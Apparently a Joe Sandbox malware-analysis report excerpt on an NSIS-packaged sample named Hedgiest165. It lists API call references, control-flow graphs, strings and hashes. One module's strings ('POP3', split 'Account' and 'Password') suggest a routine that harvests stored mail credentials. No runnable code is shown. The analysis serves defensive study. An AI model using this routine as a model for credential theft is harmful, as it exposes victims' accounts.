                                                                        • EnableWindow.USER32(?,?), ref: 00404134
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
                                                                        • EnableMenuItem.USER32(00000000), ref: 00404151
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
                                                                        • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
                                                                        • SetWindowTextW.USER32(?,00423708), ref: 004041BA
                                                                        • ShowWindow.USER32(?,0000000A), ref: 004042EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                        • String ID:
                                                                        • API String ID: 184305955-0
                                                                        • Opcode ID: 6408e53a87cf1860f001efbcdeb721020d56bb7a1b3f7ff22a8272be9afdac83
                                                                        • Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
                                                                        • Opcode Fuzzy Hash: 6408e53a87cf1860f001efbcdeb721020d56bb7a1b3f7ff22a8272be9afdac83
                                                                        • Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 555 403aaa-403ac2 call 4067d0 558 403ac4-403ad4 call 406322 555->558 559 403ad6-403b0d call 4062a9 555->559 568 403b30-403b59 call 403d80 call 405db8 558->568 564 403b25-403b2b lstrcatW 559->564 565 403b0f-403b20 call 4062a9 559->565 564->568 565->564 573 403beb-403bf3 call 405db8 568->573 574 403b5f-403b64 568->574 580 403c01-403c26 LoadImageW 573->580 581 403bf5-403bfc call 406418 573->581 574->573 575 403b6a-403b92 call 4062a9 574->575 575->573 582 403b94-403b98 575->582 584 403ca7-403caf call 40140b 580->584 585 403c28-403c58 RegisterClassW 580->585 581->580 586 403baa-403bb6 lstrlenW 582->586 587 403b9a-403ba7 call 405cdd 582->587 599 403cb1-403cb4 584->599 600 403cb9-403cc4 call 403d80 584->600 588 403d76 585->588 589 403c5e-403ca2 SystemParametersInfoW CreateWindowExW 585->589 593 403bb8-403bc6 lstrcmpiW 586->593 594 403bde-403be6 call 405cb0 call 4063db 586->594 587->586 592 403d78-403d7f 588->592 589->584 593->594 598 403bc8-403bd2 GetFileAttributesW 593->598 594->573 603 403bd4-403bd6 598->603 604 403bd8-403bd9 call 405cfc 598->604 599->592 608 403cca-403ce4 ShowWindow call 406760 600->608 609 403d4d-403d55 call 405516 600->609 603->594 603->604 604->594 616 403cf0-403d02 GetClassInfoW 608->616 617 403ce6-403ceb call 406760 608->617 614 403d57-403d5d 609->614 615 403d6f-403d71 call 40140b 609->615 614->599 618 403d63-403d6a call 40140b 614->618 615->588 621 403d04-403d14 GetClassInfoW RegisterClassW 616->621 622 403d1a-403d4b DialogBoxParamW call 40140b call 4039fa 616->622 617->616 618->599 621->622 622->592
                                                                        APIs
                                                                          • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                          • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                        • lstrcatW.KERNEL32(00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420,00437800,00435000,00000000), ref: 00403B2B
                                                                        • lstrlenW.KERNEL32(004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420), ref: 00403BAB
                                                                        • lstrcmpiW.KERNEL32(004281B8,.exe,004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
                                                                        • GetFileAttributesW.KERNEL32(004281C0), ref: 00403BC9
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C12
                                                                          • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                        • RegisterClassW.USER32(004291C0), ref: 00403C4F
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403CD2
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
                                                                        • RegisterClassW.USER32(004291C0), ref: 00403D14
                                                                        • DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 1975747703-1115850852
                                                                        • Opcode ID: decbffab92dab6520bd046f472a583eea2a16f8f1dbb073b8dd3dcaf5466dc19
                                                                        • Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
                                                                        • Opcode Fuzzy Hash: decbffab92dab6520bd046f472a583eea2a16f8f1dbb073b8dd3dcaf5466dc19
                                                                        • Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 629 4044f0-404502 630 404622-40462f 629->630 631 404508-404510 629->631 632 404631-40463a 630->632 633 40468c-404690 630->633 634 404512-404521 631->634 635 404523-404547 631->635 638 404640-404646 632->638 639 404765 632->639 636 404756-40475d 633->636 637 404696-4046ae GetDlgItem 633->637 634->635 640 404550-4045cb call 404331 * 2 CheckDlgButton call 404353 GetDlgItem call 404366 SendMessageW 635->640 641 404549 635->641 636->639 647 40475f 636->647 643 4046b0-4046b7 637->643 644 404717-40471e 637->644 638->639 645 40464c-404657 638->645 642 404768-40476f call 404398 639->642 671 4045d6-40461d SendMessageW * 2 lstrlenW SendMessageW * 2 640->671 672 4045cd-4045d0 GetSysColor 640->672 641->640 653 404774-404778 642->653 643->644 649 4046b9-4046d4 643->649 644->642 650 404720-404727 644->650 645->639 651 40465d-404687 GetDlgItem SendMessageW call 404353 call 40477b 645->651 647->639 649->644 654 4046d6-404714 SendMessageW LoadCursorW SetCursor call 40479f LoadCursorW SetCursor 649->654 650->642 655 404729-40472d 650->655 651->633 654->644 660 40473f-404743 655->660 661 40472f-40473d SendMessageW 655->661 665 404751-404754 660->665 666 404745-40474f SendMessageW 660->666 661->660 665->653 666->665 671->653 672->671
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004045A2
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
                                                                        • GetSysColor.USER32(?), ref: 004045D0
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
                                                                        • lstrlenW.KERNEL32(?), ref: 004045F1
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040466C
                                                                        • SendMessageW.USER32(00000000), ref: 00404673
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040469E
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
                                                                        • SetCursor.USER32(00000000), ref: 004046F2
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
                                                                        • SetCursor.USER32(00000000), ref: 0040470E
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: N$gD@
                                                                        • API String ID: 3103080414-2715828072
                                                                        • Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                        • Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
                                                                        • Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                        • Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 673 221c173a-221c180c call 221cc030 call 221c2c40 * 2 call 221c1cca 682 221c19ad-221c19b1 673->682 683 221c1812-221c1816 673->683 683->682 684 221c181c-221c1837 call 221c1ede 683->684 687 221c183d-221c1845 684->687 688 221c199f-221c19ac call 221c1ee7 * 2 684->688 689 221c184b-221c184e 687->689 690 221c1982-221c1985 687->690 688->682 689->690 693 221c1854-221c1881 _strlen * 2 call 221c1db7 689->693 694 221c1995-221c1999 690->694 695 221c1987 690->695 702 221c193d-221c1943 693->702 703 221c1887-221c189f _strlen call 221c1db7 693->703 694->687 694->688 698 221c198a-221c198d call 221c2c40 695->698 704 221c1992 698->704 706 221c197e-221c1980 702->706 707 221c1945-221c1947 702->707 703->702 710 221c18a5-221c18a8 703->710 704->694 706->698 707->706 709 221c1949-221c194b 707->709 711 221c194d-221c194f 709->711 712 221c1961-221c197c call 221c16aa 709->712 716 221c18aa-221c18c2 _strlen call 221c1db7 710->716 717 221c18c4-221c18dc _strlen call 221c1db7 710->717 713 221c1955-221c1957 711->713 714 221c1951-221c1953 711->714 712->704 719 221c195d-221c195f 713->719 720 221c1959-221c195b 713->720 714->712 714->713 716->717 725 221c18e2-221c193b call 221c16aa call 221c15da call 221c2c40 * 2 716->725 717->694 717->725 719->706 719->712 720->712 720->719 725->694
                                                                        APIs
                                                                          • Part of subcall function 221C1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 221C1D1B
                                                                          • Part of subcall function 221C1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 221C1D37
                                                                          • Part of subcall function 221C1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 221C1D4B
                                                                        • _strlen.LIBCMT ref: 221C1855
                                                                        • _strlen.LIBCMT ref: 221C1869
                                                                        • _strlen.LIBCMT ref: 221C188B
                                                                        • _strlen.LIBCMT ref: 221C18AE
                                                                        • _strlen.LIBCMT ref: 221C18C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$File$CopyCreateDelete
                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                        • API String ID: 3296212668-3023110444
                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                        • Instruction ID: 897e3ffca47c65212eaee7e0f0804afdad6698ad7aaf5ed629ba6af4bcf95daf
                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                        • Instruction Fuzzy Hash: 99610179DC4318AFEF198BA4C841FEEB7B9AF35304F104196D204A6260EB705B46CB97

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                        • Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
                                                                        • Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                        • Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 746 406027-406055 747 406057-40606f call 405ed1 CloseHandle GetShortPathNameW 746->747 748 40607d-40608c GetShortPathNameW 746->748 751 40619c-4061a0 747->751 754 406075-406077 747->754 750 406092-406094 748->750 748->751 750->751 753 40609a-4060d8 wsprintfA call 406418 call 405ed1 750->753 753->751 759 4060de-4060fa GetFileSize GlobalAlloc 753->759 754->748 754->751 760 406100-40610a call 405f54 759->760 761 406195-406196 CloseHandle 759->761 760->761 764 406110-40611d call 405e36 760->764 761->751 767 406133-406145 call 405e36 764->767 768 40611f-406131 lstrcpyA 764->768 774 406164 767->774 775 406147-40614d 767->775 769 406168 768->769 771 40616a-40618f call 405e8c SetFilePointer call 405f83 GlobalFree 769->771 771->761 774->769 777 406155-406157 775->777 779 406159-406162 777->779 780 40614f-406154 777->780 779->771 780->777
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
                                                                        • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B
                                                                          • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                          • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                        • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
                                                                        • wsprintfA.USER32 ref: 004060A6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,?,004275A8,?,?,?,?,?), ref: 004060E1
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
                                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040618F
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196
                                                                          • Part of subcall function 00405ED1: GetFileAttributesW.KERNEL32(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                          • Part of subcall function 00405ED1: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %ls=%ls$[Rename]
                                                                        • API String ID: 2171350718-461813615
                                                                        • Opcode ID: 970157a173da4570010cddf6c99c5fbc205b5ab986513503a6189d6a5da247a7
                                                                        • Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
                                                                        • Opcode Fuzzy Hash: 970157a173da4570010cddf6c99c5fbc205b5ab986513503a6189d6a5da247a7
                                                                        • Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404871
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0040489B
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040494C
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404957
                                                                        • lstrcmpiW.KERNEL32(004281C0,00423708,00000000,?,?), ref: 00404989
                                                                        • lstrcatW.KERNEL32(?,004281C0), ref: 00404995
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7
                                                                          • Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38
                                                                          • Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                          • Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                          • Part of subcall function 0040668A: CharNextW.USER32(?,00000000,75923420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                          • Part of subcall function 0040668A: CharPrevW.USER32(?,?,75923420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                        • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85
                                                                          • Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                          • Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
                                                                          • Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A
                                                                        • API String ID: 2624150263-3554254475
                                                                        • Opcode ID: 774d2a40b0bbf4f8dd7fb20f48c4fa09ba26c8c9c63ccae399b439715fe90f39
                                                                        • Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
                                                                        • Opcode Fuzzy Hash: 774d2a40b0bbf4f8dd7fb20f48c4fa09ba26c8c9c63ccae399b439715fe90f39
                                                                        • Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403026
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                          • Part of subcall function 00405ED1: GetFileAttributesW.KERNEL32(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                          • Part of subcall function 00405ED1: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                        Strings
                                                                        • Null, xrefs: 0040310C
                                                                        • soft, xrefs: 00403103
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
                                                                        • Error launching installer, xrefs: 00403065
                                                                        • Inst, xrefs: 004030FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 2803837635-527102705
                                                                        • Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                        • Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
                                                                        • Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                        • Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(004281C0,00000400), ref: 00406559
                                                                        • GetWindowsDirectoryW.KERNEL32(004281C0,00000400,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040656C
                                                                        • SHGetSpecialFolderLocation.SHELL32(0040547A,?,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 004065A8
                                                                        • SHGetPathFromIDListW.SHELL32(?,004281C0), ref: 004065B6
                                                                        • CoTaskMemFree.OLE32(?), ref: 004065C1
                                                                        • lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
                                                                        • lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040663F
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406529
                                                                        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-730719616
                                                                        • Opcode ID: 167fb53b1a551fbe6a87316e06e77fb2607b52ca0a675a0429bb2d70b92b80cf
                                                                        • Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
                                                                        • Opcode Fuzzy Hash: 167fb53b1a551fbe6a87316e06e77fb2607b52ca0a675a0429bb2d70b92b80cf
                                                                        • Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                        • lstrlenW.KERNEL32(00403385,004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
